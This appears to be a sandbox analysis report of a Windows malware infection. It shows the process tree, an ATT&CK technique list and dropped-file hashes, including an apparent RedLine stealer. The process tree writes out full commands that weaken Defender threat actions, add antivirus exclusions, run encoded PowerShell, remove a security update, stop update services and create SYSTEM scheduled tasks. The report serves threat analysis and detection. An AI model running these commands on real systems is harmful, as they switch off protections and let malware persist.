C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:3488
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:1196
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:3520
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵PID:2668
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:2704
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:4396
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:1976
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:3428
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:2224
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:1192
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:5112
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:4320
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:1232
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:1516
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:1588
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:1584
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:3448
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:1908
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:2576
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵PID:4636
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵PID:3460
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵PID:2108
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵PID:4320
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "XyyyteIMwZeutaZuw" /SC once /ST 10:32:34 /RU "SYSTEM" /TR "\"C:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\fGKOICE.exe\" GH /qScAdidEc 385118 /S" /V1 /F2⤵
- Creates scheduled task(s)
PID:2764 -
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "XyyyteIMwZeutaZuw"2⤵PID:2488
-
C:\Windows\windefender.exeC:\Windows\windefender.exe1⤵PID:3188
-
C:\ProgramData\Google\Chrome\updater.exeC:\ProgramData\Google\Chrome\updater.exe1⤵PID:576
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force2⤵
- Command and Scripting Interpreter: PowerShell
PID:2964 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart2⤵PID:1900
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart3⤵PID:2368
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc2⤵
- Launches sc.exe
PID:5024 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc2⤵
- Launches sc.exe
PID:4640 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv2⤵
- Launches sc.exe
PID:3324 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits2⤵
- Launches sc.exe
PID:1752 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc2⤵
- Launches sc.exe
PID:348 -
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵PID:1368
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵PID:3916
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵PID:4220
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵PID:2568
-
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe2⤵PID:4932
-
C:\Windows\explorer.exeexplorer.exe2⤵PID:1224
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Command and Scripting Interpreter: PowerShell
PID:2192
-
C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exeC:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe1⤵PID:1628
-
C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exeC:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe1⤵PID:4016
-
C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exeC:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe1⤵PID:5048
-
C:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\HePgjOk.exeC:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\HePgjOk.exe GH /wMqFdidnv 385118 /S1⤵PID:3792
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"2⤵PID:1784
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"3⤵PID:3552
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 64⤵PID:724
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵PID:728
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"3⤵PID:2080
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 64⤵PID:2132
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵PID:864
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"3⤵PID:2952
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 64⤵PID:2916
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵PID:2912
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"3⤵PID:5108
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 64⤵PID:4648
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵PID:3220
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵PID:3960
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force4⤵PID:2132
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵
- Command and Scripting Interpreter: PowerShell
PID:3492 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force6⤵PID:1496
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bbmnnUCIPYyTQrzMQJ"2⤵PID:4920
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &2⤵PID:3068
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"3⤵PID:2820
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True4⤵PID:1196
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True5⤵
- Command and Scripting Interpreter: PowerShell
PID:3972 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True6⤵PID:5108
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\ADJLsahCU\wXbPHi.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "FPieTEPPuEmJrhC" /V1 /F2⤵
- Creates scheduled task(s)
PID:2124 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "FPieTEPPuEmJrhC2" /F /xml "C:\Program Files (x86)\ADJLsahCU\ZvrPYJz.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:2704 -
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "FPieTEPPuEmJrhC"2⤵PID:2148
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "FPieTEPPuEmJrhC"2⤵PID:1144
-
C:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\fGKOICE.exeC:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\fGKOICE.exe GH /qScAdidEc 385118 /S1⤵PID:2956
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"2⤵PID:656
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"3⤵PID:2820
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 64⤵PID:2444
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵PID:1032
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"3⤵PID:2288
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 64⤵PID:2700
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵PID:1232
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"3⤵PID:1672
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 64⤵PID:1540
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵PID:1008
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"3⤵PID:3560
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 64⤵PID:4920
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵PID:4912
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵PID:1496
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force4⤵PID:3924
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:1584
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1System Services
2Service Execution
2Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
3Windows Service
3Pre-OS Boot
1Bootkit
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
3Windows Service
3Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
5Disable or Modify System Firewall
1Disable or Modify Tools
3Modify Registry
6Pre-OS Boot
1Bootkit
1Subvert Trust Controls
1Install Root Certificate
1Virtualization/Sandbox Evasion
2Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files (x86)\GameStabilityService\GameService.exeFilesize
288KB
MD5d9ec6f3a3b2ac7cd5eef07bd86e3efbc
SHA1e1908caab6f938404af85a7df0f80f877a4d9ee6
SHA256472232ca821b5c2ef562ab07f53638bc2cc82eae84cea13fbe674d6022b6481c
SHA5121b6b8702dca3cb90fe64c4e48f2477045900c5e71dd96b84f673478bab1089febfa186bfc55aebd721ca73db1669145280ebb4e1862d3b9dc21f712cd76a07c4
-
C:\Program Files (x86)\GameStabilityService\GameStabilityService.exeFilesize
6.2MB
MD5c4f2b643c3ff9bb7ae4fd625c9d98154
SHA1bd7c7190e45cbda09be256bee7622bb74f75f00c
SHA25676b585b4eac7b0584f28d66d6bf37ad29b1ab73354cbd3c5bb1c819787208f0b
SHA5122efeaf9473ac1a8f42fd5870154faa37b06e4f331768cd7934fd4aa685eb6da4e28eaa7357807c4bf37dd79fc4a5eaf70ab4324ed0100dcdb4abaf4d9b0a7dcb
-
C:\Program Files (x86)\GameStabilityService\installm.batFilesize
247B
MD5192ae14b572f1bdd164ee67855d5a83a
SHA19cf0757c807a8b834470d216ccd85be9a6b60aa0
SHA2562f6be6b40cf7c1802b6540dbf0b90eac67fd6a94067a06090e1f71bee164188d
SHA51218fc80eb3d450359863d61cf9123a08cdfe8c52d5f59e97f5b42816584d474d8a080bb75e7fe92480d2961481d59584a3987b2e7a15e611b58885b4441085e3c
-
C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpiFilesize
2.0MB
MD55236c2dc497a2fa3785bc83b409255fb
SHA111719cf1bf0e40b473044577cd7fe3f11f6a9488
SHA25664cfbbe6311c2212f8d36d53204ceefdcc8bb9f3bd888472b38ac6d5f8f85c5b
SHA512b293af2c317e92dd27a616da03fea7912f8efff9af9f8c4bf619c44b3f2ae49e756af2bb95b18be5d39ad6cb371611efbf92dfee06fcf90159090a04a35dbed4
-
C:\ProgramData\mozglue.dllFilesize
593KB
MD5c8fd9be83bc728cc04beffafc2907fe9
SHA195ab9f701e0024cedfbd312bcfe4e726744c4f2e
SHA256ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a
SHA512fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040
-
C:\ProgramData\nss3.dllFilesize
2.0MB
MD51cc453cdf74f31e4d913ff9c10acdde2
SHA16e85eae544d6e965f15fa5c39700fa7202f3aafe
SHA256ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5
SHA512dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.jsonFilesize
187B
MD52a1e12a4811892d95962998e184399d8
SHA155b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA25632b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.jsonFilesize
136B
MD5238d2612f510ea51d0d3eaa09e7136b1
SHA10953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA5122630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.jsonFilesize
150B
MD50b1cf3deab325f8987f2ee31c6afc8ea
SHA16a51537cef82143d3d768759b21598542d683904
SHA2560ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA5125bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.logFilesize
2KB
MD5d0c46cad6c0778401e21910bd6b56b70
SHA17be418951ea96326aca445b8dfe449b2bfa0dca6
SHA2569600b3fdf0565ccb49e21656aa4b24d7c18f776bfd04d9ee984b134707550f02
SHA512057531b468f7fbbb2175a696a8aab274dec0d17d9f71df309edcff35e064f3378050066a3df47ccd03048fac461594ec75e3d4fe64f9dd79949d129f51e02949
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\geiolieogaichbpfhcannipendgnnbkn\1.0.1_0\_locales\es\messages.jsonFilesize
151B
MD5bd6b60b18aee6aaeb83b35c68fb48d88
SHA19b977a5fbf606d1104894e025e51ac28b56137c3
SHA256b7b119625387857b257dd3f4b20238cdbe6c25808a427f0110bcb0bf86729e55
SHA5123500b42b17142cd222bc4aa55bf32d719dbd5715ff8d0924f1d75aec4bc6aa8e9ca8435f0b831c73a65cc1593552b9037489294fbf677ba4e1cec1173853e45b
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-InteractiveFilesize
20KB
MD5598d2cbb5195a79cd30240728e262bf6
SHA11a722553f145d7f29da1800f9ee248e54323f3a9
SHA25605a16b8058fdb6ee7b127b55e0f159b341d55826bd62667cea128e0ce4a0622f
SHA512d1e46e15bcc507dc533e96f8a14eecc1e09a81db4a21143f87507e254a9a0b317ca079437fedbf8c5456d853fadb72a4ff2333514822368028d853fdeced95c6
-
C:\Users\Admin\AppData\Local\Temp\[email protected]Filesize
656B
MD5184a117024f3789681894c67b36ce990
SHA1c5b687db3b27ef04ad2b2cbc9f4e523cb7f6ba7e
SHA256b10d5fef165fc89e61cd16e02eac1b90b8f94ef95218bdd4b678cd0d5c8a925e
SHA512354d3bbc1329cbbe30d22f0cf95564e44acc68d6fe91e2beb4584a473d320faf4c092de9db7f1f93cf0b235703fc8de913883985c7d5db6b596244771a1edaf7
-
C:\Users\Admin\AppData\Local\Temp\[email protected]\setup.iniFilesize
830B
MD5e6edb41c03bce3f822020878bde4e246
SHA103198ad7bbfbdd50dd66ab4bed13ad230b66e4d9
SHA2569fa80f0889358d9db3d249a2e747e27b7c01c6123b784d94d169c0e54cacf454
SHA5122d71b7d50212f980e82562af95598c430aa0875f7a9d9cc670ba2cb1f63057fb26fd747a99cb4ca08f2355d002daa79bda2236b3ad9e37a3cfef32ae5420e2a1
-
C:\Users\Admin\AppData\Local\Temp\1000003001\alex.exeFilesize
2.7MB
MD531841361be1f3dc6c2ce7756b490bf0f
SHA1ff2506641a401ac999f5870769f50b7326f7e4eb
SHA256222393a4ab4b2ae83ca861faee6df02ac274b2f2ca0bed8db1783dd61f2f37ee
SHA51253d66fa19e8db360042dadc55caaa9a1ca30a9d825e23ed2a58f32834691eb2aaaa27a4471e3fc4d13e201accc43160436ed0e9939df1cc227a62a09a2ae0019
-
C:\Users\Admin\AppData\Local\Temp\1000004001\crypted333.exeFilesize
474KB
MD5e967f019b01357086d92181e6ee28e0b
SHA17f26480ea5ca0ee9481dfc0bea12194bd6f10283
SHA256c69c17f4c6b2206437e7954c02424b80605d40e98c0adcad6839e170c94b1c82
SHA512dd2abe993397cf9f117753fd71ed9f98c4952616ee30f10479fbc3dad93a88dcfbfd6b80083541c7a796936dd37667a0f178156bdf5c35abf76dd8b23015d88a
-
C:\Users\Admin\AppData\Local\Temp\1000005001\redline1.exeFilesize
304KB
MD59faf597de46ed64912a01491fe550d33
SHA149203277926355afd49393782ae4e01802ad48af
SHA2560854678d655668c8ebb949c990166e26a4c04aef4ecf0191a95693ca150a9715
SHA512ef8a7a8566eaf962c4e21d49d9c1583ed2cdc9c2751ce75133a9765d2fa6dc511fc6cc99ea871eb83d50bd08a31cb0b25c03f27b8e6f351861231910a6cf1a1e
-
